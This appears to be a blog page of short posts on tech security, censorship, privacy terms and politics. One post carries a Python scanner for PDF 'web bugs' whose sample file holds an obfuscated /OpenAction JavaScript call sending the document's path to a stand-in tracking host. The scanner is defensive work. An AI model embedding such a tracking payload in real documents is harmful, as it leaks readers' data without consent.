Less haste, more security

This morning’s observer column:

I ran into my favourite technophobe the other day. “I see,” he chortled, “that your tech industry (he holds me responsible for everything that is wrong with the modern world) is in meltdown!” The annoying thing is that he was partly right. What has happened is that two major security vulnerabilities – one of them has been christened “Meltdown”, the other “Spectre” – have been discovered in the Central Processing Unit (CPU) chips that power most of the computers in the world.

A CPU is a device for performing billions of apparently trivial operations in sequences determined by whatever program is running: it fetches some data from memory, performs some operations on that data and then sends it back to memory; then fetches the next bit of data; and so on. Two decades ago some wizard had an idea for speeding up CPUs…

Read on


Lest we get too optimistic about 2018, this from Eliot Cohen, Director of the Strategic Studies program at Johns Hopkins:

There are sounds, for those who can hear them, of the preliminary and muffled drumbeats of war. The Chinese are reported to be preparing refugee camps along the North Korean border. Resources are being shifted to observe and analyze the North Korean military. Mundane logistical processes of moving, stockpiling, and updating crucial items and preparing military personnel are under way. Only the biggest indicator—the evacuation of American dependents from South Korea—has yet to flash red, but, in the interest of surprise, that may not happen. America’s circumspect and statesmanlike secretary of defense, James Mattis, talks ominously of storm clouds gathering over Korea, while the commandant of the Marine Corps simply says, “I hope I’m wrong, but there’s a war coming.”

Maybe nothing will happen. Maybe Donald Trump, he of the five draft deferments during the Vietnam War, will flinch from launching a war as commander in chief, in which case the United States will merely suffer an epic humiliation as it retreats from as big a red line as a president has ever drawn. Still, lots of people have an interest in war. For Russia, the opportunity to set the United States and China against each other over Korea is a dream come true. For narrow-minded American strategists, it is the only way of cutting the North Korean nuclear Gordian knot. For Kim Jong Un peeking over the edge of the precipice may cause South Korea to break with the Americans, or the Chinese to fight them. For Donald Trump it may be a moment of glory, a dramatic vindication of campaign promises, and an opportunity to distract American minds from Robert Mueller’s investigation of his campaign’s ties to the Russians. And so threats and bluster may turn into violent realities. And if they do, not tomorrow or the next day, but some time in 2018, a Second Korean War could very well make it one of those years in which history swings on its hinge.

Burma’s Internet Crackdown

Tech Review has an interesting interview with John Palfrey of the Berkman Center. The preface to the interview reads:

The Burmese government’s recent shutdown of the country’s Internet connections amid pro-democracy protests was a new low for what is already one of the most censorious nations in the world. Earlier this year, the OpenNet Initiative–a collaboration among researchers at Harvard, Oxford, Cambridge, and the University of Toronto–found that the nation’s rulers blocked 85 percent of e-mail service providers and nearly all political-opposition and pro-democracy sites. (See “Internet Increasingly Censored.”) All this in a nation in which less than 1 percent of citizens have Internet access in the first place.

Last week–after images of the beatings of Buddhist monks and the killing of a Japanese photographer leaked out via the Internet–Burma’s military rulers took the ultimate step, apparently physically disconnecting primary telecommunications cables in two major cities, in a drastic effort to stop the flow of information from Burma to the rest of the world. It didn’t completely work: some bloggers apparently used satellite links or cellular phone services to get information outside the country.

One chilling exchange in the interview goes:

TR: How does this shutdown compare with other state-controlled actions you’ve documented?

JP: I’ve never seen anything like this cutoff to the Internet at such a broad scale so crudely and completely. They’ve taken the nuclear-bomb approach. We’ve witnessed what appear to be denial-of-service-type attacks during elections, for instance, but nothing so large-scale like this shutdown. Still, information has leaked out. So the military junta has found that given the many routes to the global telecommunications infrastructure, it’s very hard to cut off a place entirely.

So much for John Perry Barlow’s utopian dreams — to which (full disclosure) I once also subscribed. Sigh.

Homeland security

Here’s a sobering account of what happened recently to a distinguished US academic lawyer, Professor Walter Murphy of Princeton.

“On 1 March 07, I was scheduled to fly on American Airlines to Newark, NJ, to attend an academic conference at Princeton University, designed to focus on my latest scholarly book, Constitutional Democracy, published by Johns Hopkins University Press this past Thanksgiving.”

“When I tried to use the curb-side check in at the Sunport, I was denied a boarding pass because I was on the Terrorist Watch list. I was instructed to go inside and talk to a clerk. At this point, I should note that I am not only the McCormick Professor of Jurisprudence (emeritus) but also a retired Marine colonel. I fought in the Korean War as a young lieutenant, was wounded, and decorated for heroism. I remained a professional soldier for more than five years and then accepted a commission as a reserve officer, serving for an additional 19 years.”

“I presented my credentials from the Marine Corps to a very polite clerk for American Airlines. One of the two people to whom I talked asked a question and offered a frightening comment: “Have you been in any peace marches? We ban a lot of people from flying because of that.” I explained that I had not so marched but had, in September, 2006, given a lecture at Princeton, televised and put on the Web, highly critical of George Bush for his many violations of the Constitution. “That’ll do it,” the man said.”

“After carefully examining my credentials, the clerk asked if he could take them to TSA officials. I agreed. He returned about ten minutes later and said I could have a boarding pass, but added: “I must warn you, they’re going to ransack your luggage.” On my return flight, I had no problem with obtaining a boarding pass, but my luggage was “lost.” Airlines do lose a lot of luggage and this “loss” could have been a mere coincidence. In light of previous events, however, I’m a tad skeptical.”

“I confess to having been furious that any American citizen would be singled out for governmental harassment because he or she criticized any elected official, Democrat or Republican. That harassment is, in and of itself, a flagrant violation not only of the First Amendment but also of our entire scheme of constitutional government. This effort to punish a critic states my lecture’s argument far more eloquently and forcefully than I ever could. Further, that an administration headed by two men who had “had other priorities” than to risk their own lives when their turn to fight for their country came up, should brand as a threat to the United States a person who did not run away but stood up and fought for his country and was wounded in battle, goes beyond the outrageous. Although less lethal, it is of the same evil ilk as punishing Ambassador Joseph Wilson for criticizing Bush’s false claims by “outing” his wife, Valerie Plame, thereby putting at risk her life as well as the lives of many people with whom she had had contact as an agent of the CIA. …”

Bin Laden has won, hands down. My boycott of the US stands.

Apple apes Microsoft-type cluelessness

Apple software is generally pretty well designed, so it comes as a shock to find the company making the kind of dumb mistake that is normally a Microsoft speciality. The new version of Mac OS X (codenamed ‘Tiger’) comes with a facility called ‘Dashboard’ which runs ridiculous little applets called Widgets. These are basically small programs masquerading as web pages. But Tiger also includes a new version of the Safari browser with a crazily insecure default setting which could leave your system wide open to malware via these same widgets. See here for the grisly details. You can turn off the default, of course, but I guess many of the non-technical users Apple is now targeting with the Mac Mini won’t realise the need to do that. As I said, this is the kind of stuff Microsoft does (as when it shipped XP with the firewall turned off by default — now rectified, I’m glad to say).

Adobe Acrobat now enables spying on readers

Like many non-Microsoft users, I rely on Adobe pdf as a way of circulating and publishing documents. But now it transpires that

The well known PDF reader Adobe Reader reports back to a central server whenever you open specially marked PDF documents.

The newly released Adobe Reader 7 again allows authors of PDF documents to embed an arbitrary web address which is then informed whenever you open the document.

According to one of the Slashdot postings, the current Remote Approach tracking code already sends off the full file path to the PDF on your computer, which could in itself include confidential information. This use of “web-bugs” is the same functionality used by spammers to track and verify use of your email address and is done without informing the user and without his or her consent.

It’s all done with JavaScript. According to the link, you can disable the spying ‘feature’ either by deleting all plugins or by renaming the plugin directory acroread7/Reader/intellinux/plug_ins. (But you have to remember to repeat this every time there is an update.)

Alternatively you can use one of the free PDF viewers (xpdf, kpdf, evince etc.), none of which allows this surreptitious functionality of reporting back.
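If you would rather know which documents carry this kind of call-home before you open them, the ingredients are visible in the file itself: an automatic trigger (`/OpenAction`, or `/AA` additional actions) paired with an action that reaches out (`/JavaScript`, `/URI`, `/SubmitForm` and friends) and, usually, the URL it reports to. The following scanner is an added example written for this post, not code from Adobe or from the linked articles; the two embedded PDFs are constructed samples (the tracking URL `tracker.example` and the use of `this.path` to leak the file path are assumptions made to mirror the behaviour described above, not observed Remote Approach code). It also undoes PDF name escapes such as `/Open#41ction`, a common trick for hiding these keys from naive grep.

```python
"""Scan a PDF for the hooks a 'web bug' needs: an automatic trigger
(/OpenAction or /AA) plus an action that reaches out (/JavaScript, /URI,
/SubmitForm, /Launch, /GoToR, /ImportData) and any URLs it names.

Works on raw bytes only: content inside /FlateDecode or object streams
would have to be inflated first (e.g. with pdfminer or qpdf --qdf).
"""
import re
import sys
from dataclasses import dataclass, field

TRIGGER_KEYS = (b"/OpenAction", b"/AA")
ACTION_KEYS = (b"/JavaScript", b"/JS", b"/URI", b"/SubmitForm",
               b"/Launch", b"/GoToR", b"/ImportData")

_NAME_TOKEN = re.compile(rb"/[^\s/\[\]<>()]+")      # a PDF name object
_NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")    # /J#53 -> /JS
_URL = re.compile(rb"https?://[^\s()<>\"']+")


@dataclass
class Report:
    triggers: list = field(default_factory=list)
    actions: list = field(default_factory=list)
    urls: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A trigger alone (e.g. "open at page 3") is harmless; an action
        # alone needs a click. Both together fire on open without consent.
        return bool(self.triggers) and bool(self.actions)


def normalize_names(data: bytes) -> bytes:
    """Decode #xx escapes inside name tokens so obfuscated keys match."""
    def fix(m: re.Match) -> bytes:
        return _NAME_ESCAPE.sub(lambda e: bytes([int(e.group(1), 16)]), m.group(0))
    return _NAME_TOKEN.sub(fix, data)


def _has_key(norm: bytes, key: bytes) -> bool:
    # Negative lookahead stops /JS matching inside /JSXYZ-style names.
    return re.search(re.escape(key) + rb"(?![A-Za-z])", norm) is not None


def scan_pdf(data: bytes) -> Report:
    norm = normalize_names(data)
    rep = Report()
    rep.triggers = [k.decode() for k in TRIGGER_KEYS if _has_key(norm, k)]
    rep.actions = [k.decode() for k in ACTION_KEYS if _has_key(norm, k)]
    rep.urls = sorted({u.decode("latin-1") for u in _URL.findall(norm)})
    return rep


# Constructed sample: a catalog whose (escaped) /OpenAction runs JavaScript
# that posts the document's local path to a hypothetical tracking host.
TRACKING_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /Open#41ction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /S /JavaScript /JS (this.getURL("http://tracker.example/ping?doc=" + this.path);) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed sample: same skeleton with no actions at all.
CLEAN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""


def scan_file(path: str) -> Report:
    with open(path, "rb") as fh:
        return scan_pdf(fh.read())


if __name__ == "__main__":
    targets = sys.argv[1:]
    reports = [(p, scan_file(p)) for p in targets] if targets else [
        ("TRACKING_PDF", scan_pdf(TRACKING_PDF)), ("CLEAN_PDF", scan_pdf(CLEAN_PDF))]
    for name, rep in reports:
        flag = "SUSPICIOUS" if rep.suspicious else "ok"
        print(f"{name}: {flag} triggers={rep.triggers} actions={rep.actions} urls={rep.urls}")
```

Run it over a directory of PDFs before opening them in Acrobat; anything flagged SUSPICIOUS deserves a look in a viewer that does not execute JavaScript. A real-world version must inflate compressed streams first, since a tracker that cares about stealth will put the action dictionary inside one.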

[Thanks to Seb for the link.]

Security blindness

Interesting editorial in MIT Technology review about the long term implications of siphoning off research funding to support a narrow security agenda. Excerpt:

American technology—just like its foreign policy, domestic politics, and popular culture—has been swept up into what Presi­dent George W. Bush calls “the global war on terror.” The U.S. R&D establishment has narrowed its interests in the years since September 11, 2001, concentrating its resources on technologies that provide security: weapons systems, defenses against biological weapons, biometrics, network security. The U.S. government’s research-and-development budget is now bluntly militaristic. In fiscal year 2005, federal R&D spending rose 4.8 percent to $132.2 billion, but 80 percent of that increase went to defense research. And most of that increase is committed to the development of new weaponry, like the ­ballistic-missile defense system. In all, the government will spend 57 percent of its R&D budget for 2005, or a record $75 billion, on defense-related projects. President Bush’s proposed 2006 budget, now being debated in Congress, would introduce cuts to many civilian programs but spend an additional $600 million on defense research.

The author (Jason Pontin) goes on to point out that organisations like the National Science Foundation and the National Institutes of Health are being correspondingly starved of federal funding.

AOL thinks again about AIM Terms of Service

According to eWeek (where do they get these names from?), AOL has been taken aback by the storm of protest raised by its plans to change the terms of service under which people use AIM.

“We’re not making any policy changes. We’re making some linguistic changes to clarify certain things and explain it a little better to our users,” AOL spokesperson Andrew Weinstein told eWEEK.com.

The modifications will use similar language from the AIM privacy policy to “make it clear that AOL does not read private user-to-user communications,” Weinstein said.

“We’ll be adding that to the beginning of the section to make it clear that the privacy rights discussed in that section only refer to content posted to public areas of the AIM service.”

More importantly, Weinstein said a blunt and inelegant line that reads “You waive any right to privacy” will be deleted altogether.

“That’s a phrase that should not have been in that section in the first place. It clearly caused confusion, with good reason,” Weinstein conceded.

Over the last weekend, AOL representatives moved to quell public criticism of the terms of service after the issue was first flagged on Weblogs and discussion forums.

[Thanks to Dave and Quentin for the update.]

Time to abandon AIM

According to this, AOL have modified their terms and conditions to read:

Although you or the owner of the Content retain ownership of all right, title and interest in Content that you post to any AIM Product, AOL owns all right, title and interest in any compilation, collective work or other derivative work created by AOL using or incorporating this Content. In addition, by posting Content on an AIM Product, you grant AOL, its parent, affiliates, subsidiaries, assigns, agents and licensees the irrevocable, perpetual, worldwide right to reproduce, display, perform, distribute, adapt and promote this Content in any medium. You waive any right to privacy. You waive any right to inspect or approve uses of the Content or to be compensated for any such uses.

If this is true, then nobody should use AIM. Useful though it has been, it’s time to call a halt.

EU Council approves software patents

Despite being told by the European Parliament to think again, the EU Council of Ministers has adopted the software patent directive, in the face of requests from Denmark, Poland and Portugal to reject the directive. An EU Council representative said that the Computer Implemented Inventions Directive had been adopted but was unable to give more details. As it now stands, the directive would legalize software patents. This is Really Bad News because the only people really in favour of this are a number of very large and powerful software companies, including a noted abusive monopolist based in the US. The Directive now goes back to the Parliament. If you don’t know who your MEP is, now is the time to find out. This madness has to be stopped. Among other things, it could wipe out Open Source software. The European Parliament can stop it, but will only do so if its members understand the full implications of what is being proposed.